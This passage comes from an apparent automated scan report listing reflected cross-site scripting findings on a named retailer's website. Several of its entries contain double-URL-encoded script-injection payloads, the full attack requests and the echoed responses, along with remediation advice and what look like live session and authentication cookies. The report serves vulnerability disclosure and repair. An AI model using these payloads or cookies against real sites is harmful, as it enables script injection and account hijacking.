The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /js/sigma_functions.jsf3553%2522%253balert%25281%2529%252f%252f5a779589bc9 HTTP/1.1
Accept: */*
Referer: http://www.sigmaaldrich.com/sigma-aldrich/home.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: www.sigmaaldrich.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:05:00 GMT
Connection: close
Set-Cookie: JSESSIONID=ffe307b3-a081-1149-89f6-52c75f3fac9a;Path=/
Content-Length: 28925


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/js/sigma_functions.jsf3553";alert(1)//5a779589bc9","E404") ;
   </script>
...[SNIP]...

1.529. http://www.sigmaaldrich.com/life-science.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95089%2522%253balert%25281%2529%252f%252fbe619902a5f was submitted in the REST URL parameter 1. This input was echoed as 95089";alert(1)//be619902a5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /95089%2522%253balert%25281%2529%252f%252fbe619902a5f HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:23 GMT
Content-Length: 28904
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/95089";alert(1)//be619902a5f","E404") ;
   </script>
...[SNIP]...

1.530. http://www.sigmaaldrich.com/life-science/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1cea%2522%253balert%25281%2529%252f%252fc66df451b20 was submitted in the REST URL parameter 1. This input was echoed as f1cea";alert(1)//c66df451b20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencef1cea%2522%253balert%25281%2529%252f%252fc66df451b20/ HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:48 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencef1cea";alert(1)//c66df451b20/","E404") ;
   </script>
...[SNIP]...

1.531. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-biology.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bef61%2522%253balert%25281%2529%252f%252f4ca28d46b6d was submitted in the REST URL parameter 1. This input was echoed as bef61";alert(1)//4ca28d46b6d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencebef61%2522%253balert%25281%2529%252f%252f4ca28d46b6d/cell-biology.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencebef61";alert(1)//4ca28d46b6d/cell-biology.html","E404") ;
   </script>
...[SNIP]...

1.532. http://www.sigmaaldrich.com/life-science/cell-biology.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-biology.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de631%2522%253balert%25281%2529%252f%252f6a1d1e6ced9 was submitted in the REST URL parameter 2. This input was echoed as de631";alert(1)//6a1d1e6ced9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/de631%2522%253balert%25281%2529%252f%252f6a1d1e6ced9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:29 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/de631";alert(1)//6a1d1e6ced9","E404") ;
   </script>
...[SNIP]...

1.533. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-culture.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffa01%2522%253balert%25281%2529%252f%252fe7437acb32f was submitted in the REST URL parameter 1. This input was echoed as ffa01";alert(1)//e7437acb32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceffa01%2522%253balert%25281%2529%252f%252fe7437acb32f/cell-culture.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


